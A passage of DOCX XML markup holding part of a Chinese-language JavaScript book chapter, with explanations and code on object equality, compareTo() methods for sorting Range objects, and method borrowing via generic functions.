    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注意，</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>两个值是无法用于</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>运算的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!(that instanceof Set))return false;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果两个集合的大小不一样，则它们不相等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(this.size()!=that.size())return false;//</w:t>
      </w:r>
      <w:r>
        <w:t>现在检查两个集合中的元素是否完全一样</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果两个集合不相等，则通过抛出异常来终止</w:t>
      </w:r>
      <w:r>
        <w:t>foreach</w:t>
      </w:r>
      <w:r>
        <w:t>循环</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>try{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>this.foreach(function(v){if(!t</w:t>
      </w:r>
      <w:r>
        <w:t>hat.contains(v))throw false;});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return true;//</w:t>
      </w:r>
      <w:r>
        <w:t>所有的元素都匹配</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>两个集合相等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}catch(x){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(x===false)return false;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果集合中有元素在另外一个集合中不存在</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>throw x;//</w:t>
      </w:r>
      <w:r>
        <w:t>重新抛出异常</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按照我们需要的方式比较对象是否相等常常是很有用的。对于某些类来说，往往需要比较一个实例</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>大于</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>小于</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>另外一个示例。比如，你可能会基于</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>对象的下边界来定义实例的大小关系。枚举类型可以根据名字的字母表顺序来定义实例</w:t>
      </w:r>
      <w:r>
        <w:t>的大小，也可以根据它包含的数值（假设它包含的都是数字）来定义大小。另一方面，</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>对象其实是无法排序的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果将对象用于</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的关系比较运算符，比如</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=”</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>会首先调用对象的</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，如果这个方法返回一个原始值，则直接比较原始值。例</w:t>
      </w:r>
      <w:r>
        <w:t>9-7</w:t>
      </w:r>
      <w:r>
        <w:t>中由</w:t>
      </w:r>
      <w:r>
        <w:t>enumeration()</w:t>
      </w:r>
      <w:r>
        <w:t>方法所返回的枚举类型包含</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，因此可以使用关系运算符对它们做有意义的比较。但大多数类并没有</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，为了按照显式定义的规则来比较这些类型的对象，可以定义一个</w:t>
      </w:r>
      <w:r>
        <w:t>名叫</w:t>
      </w:r>
      <w:r>
        <w:t>compareTo()</w:t>
      </w:r>
      <w:r>
        <w:t>的方法（同样，这里遵照</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>中的命名约定）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>compareTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法应当只能接收一个参数，这个方法将这个参数和调用它的对象进行比较。如果</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>对象小于参数对象，</w:t>
      </w:r>
      <w:r>
        <w:t>compareTo()</w:t>
      </w:r>
      <w:r>
        <w:t>应当返回比</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>小的值。如果</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>对象大于参数对象，应当返回比</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>大的值。如果两个对象相等，应当返回</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。这些关于返回值的约定非常重要，这样我们可以用下面的表达式替换掉关系比较和相等性运算符：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251674624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="2014267" cy="1199071"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="16" name="00016.jpeg" descr="000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00016.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2014267" cy="1199071"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-8</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>Card</w:t>
      </w:r>
      <w:r>
        <w:t>类定义了该类的</w:t>
      </w:r>
      <w:r>
        <w:t>compareTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，可以给</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>类添加一个类似的方法，用</w:t>
      </w:r>
      <w:r>
        <w:t>以比较它们的下边界：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Range.prototype.compareTo=function(that){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this.from-that.from;</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需要注意的是，这个方法中的减法操作根据两个</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>对象的关系正确地返回了小于</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>、等于</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>和大于</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>的值。例</w:t>
      </w:r>
      <w:r>
        <w:t>9-8</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>Card.Rank</w:t>
      </w:r>
      <w:r>
        <w:t>枚举值包含</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，其实也可以给</w:t>
      </w:r>
      <w:r>
        <w:t>Card</w:t>
      </w:r>
      <w:r>
        <w:t>类实现类似的</w:t>
      </w:r>
      <w:r>
        <w:t>compareTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>上文所提到的</w:t>
      </w:r>
      <w:r>
        <w:t>equals()</w:t>
      </w:r>
      <w:r>
        <w:t>方法对其参数执行了类型检查，如果参数类型不合法则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>compareTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法并没有返回一个表示</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>这两个值不能比较</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的值，由于</w:t>
      </w:r>
      <w:r>
        <w:t>compareTo()</w:t>
      </w:r>
      <w:r>
        <w:t>没有对参数做任何类型检查，因此如果给</w:t>
      </w:r>
      <w:r>
        <w:t>compareTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法传入错误类型的参数，往往会抛出异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，如果两个范围对象的下边界相等，为</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>类定义的</w:t>
      </w:r>
      <w:r>
        <w:t>compareTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会返回</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。这意味着就</w:t>
      </w:r>
      <w:r>
        <w:t>compareTo()</w:t>
      </w:r>
      <w:r>
        <w:t>而言，任何两个起始点相同</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>对象都相等。这个相等概念的定义和</w:t>
      </w:r>
      <w:r>
        <w:t>equals()</w:t>
      </w:r>
      <w:r>
        <w:t>方法定义的</w:t>
      </w:r>
      <w:r>
        <w:t>相等概念是相背的，</w:t>
      </w:r>
      <w:r>
        <w:t>equals()</w:t>
      </w:r>
      <w:r>
        <w:t>要求两个端点均相等才算相等。这种相等概念上的差异性会造成很多</w:t>
      </w:r>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
      <w:r>
        <w:t>，最好将</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>类的</w:t>
      </w:r>
      <w:r>
        <w:t>equals()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>compareTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法中处理相等的逻辑保持一致。这里是</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>类修正后的</w:t>
      </w:r>
      <w:r>
        <w:t>compareTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，它的比较逻辑和</w:t>
      </w:r>
      <w:r>
        <w:t>equals()</w:t>
      </w:r>
      <w:r>
        <w:t>保持一致，但当传入不可比较的值时仍然会报错：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>根据下边界来对</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>对象排序，如果下边界相等则比较上边界</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果传入非</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>值，则抛出异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>当且仅当</w:t>
      </w:r>
      <w:r>
        <w:t>this.equals(that)</w:t>
      </w:r>
      <w:r>
        <w:t>时，才返回</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Range.proto</w:t>
      </w:r>
      <w:r>
        <w:t>type.compareTo=function(that){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!(that instanceof Range))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>throw new Error("Can't compare a Range with"+that);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var diff=this.from-that.from;//</w:t>
      </w:r>
      <w:r>
        <w:t>比较下边界</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(diff==0)diff=this.to-that.to;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果相等，比较上边界</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return diff;</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给类定义了</w:t>
      </w:r>
      <w:r>
        <w:t>compareTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，这样就可以对类的实例组成的数组进行排序了。</w:t>
      </w:r>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>.sor t()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以接收一个可选的参数，这个参数是一个函数，用来比较两个值的大小，这个函数返回值的约定和</w:t>
      </w:r>
      <w:r>
        <w:t>compareTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法保持一致。假定有了上文提到的</w:t>
      </w:r>
      <w:r>
        <w:t>compareTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，就可以很方便地对</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>对象组成的数组进行排序了：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ranges.sort(function(a,b){return a.compareTo(b);});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>排序运算非常重要，如果已经为类定义了实例方法</w:t>
      </w:r>
      <w:r>
        <w:t>compareTo()</w:t>
      </w:r>
      <w:r>
        <w:t>，还应当参照这个方法定义一个可传入两个参数的比较函数。使用</w:t>
      </w:r>
      <w:r>
        <w:t>compareTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以非常轻松地定义这个函数，比如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Range.byLowerBound=function(a,b){return a.compareTo(b);};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用这个方法可以让数组排序的操作变得非常简单：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ranges.sort(Range.byLowerBound);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有些类可以有很多方法进行排序。比如</w:t>
      </w:r>
      <w:r>
        <w:t>Card</w:t>
      </w:r>
      <w:r>
        <w:t>类，可以定义两个方法分别按照花色排序和按照点数排序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="240" w:name="9_6_5_Fang_Fa_Jie_Yong_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>9.6.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　方法借用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="240"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的方法没有什么特别：无非是一些简单的函数，赋值给了对象的属性，可以通过对象来调用它。一个函数可以赋值给两个属性，然后作为两个方法来调用它。比如，我们在</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>类中就这样做了，将</w:t>
      </w:r>
      <w:r>
        <w:t>toArray()</w:t>
      </w:r>
      <w:r>
        <w:t>方法创建了一个副本，并让它可以和</w:t>
      </w:r>
      <w:r>
        <w:t>toJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>方法一样完成同样的功能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>多个类中的方法可以共用一个单独的函数。比如，</w:t>
      </w:r>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>类通常定义了一些内置方法，如果定义了一个类，它的实例</w:t>
      </w:r>
      <w:r>
        <w:t>是类数组的对象，则可以从</w:t>
      </w:r>
      <w:r>
        <w:t>Array.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>中将函数复制至所定义的类的原型对象中。如果以经典的面向对象语言的视角来看</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的话，把一个类的方法用到其他的类中的做法也称做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>多重继承</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>multiple inheritance</w:t>
      </w:r>
      <w:r>
        <w:t>）。然而，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>并不是经典的面向对象语言，我更倾向于将这种方法重用更正式地称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>方法借用</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>borrowing</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>不仅</w:t>
      </w:r>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>的方法可以借用，还可以自定义泛型方法（</w:t>
      </w:r>
      <w:r>
        <w:t>generic method</w:t>
      </w:r>
      <w:r>
        <w:t>）。例</w:t>
      </w:r>
      <w:r>
        <w:t>9-9</w:t>
      </w:r>
      <w:r>
        <w:t>定义了泛型方法</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>equa</w:t>
      </w:r>
      <w:r>
        <w:t>ls()</w:t>
      </w:r>
      <w:r>
        <w:t>，可以被</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Complex</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Card</w:t>
      </w:r>
      <w:r>
        <w:t>这些简单的类使用。如果</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>类没有定义</w:t>
      </w:r>
      <w:r>
        <w:t>equals()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，可以这样借用泛型方法</w:t>
      </w:r>
      <w:r>
        <w:t>equals()</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Range.prototype.equals=generic.equals;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，</w:t>
      </w:r>
      <w:r>
        <w:t>generic.equals()</w:t>
      </w:r>
      <w:r>
        <w:t>只会执行浅比较，因此这个方法并不适用于其实例太复杂的类，它们的实例属性通过其</w:t>
      </w:r>
      <w:r>
        <w:t>equals()</w:t>
      </w:r>
      <w:r>
        <w:t>方法指代对象。同样需要注意，这个方法包含一些特殊情况的程序逻辑，以处理新增至</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的属性（见例</w:t>
      </w:r>
      <w:r>
        <w:t>9-6</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-9</w:t>
      </w:r>
      <w:r>
        <w:t>：方法借用的泛型实现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
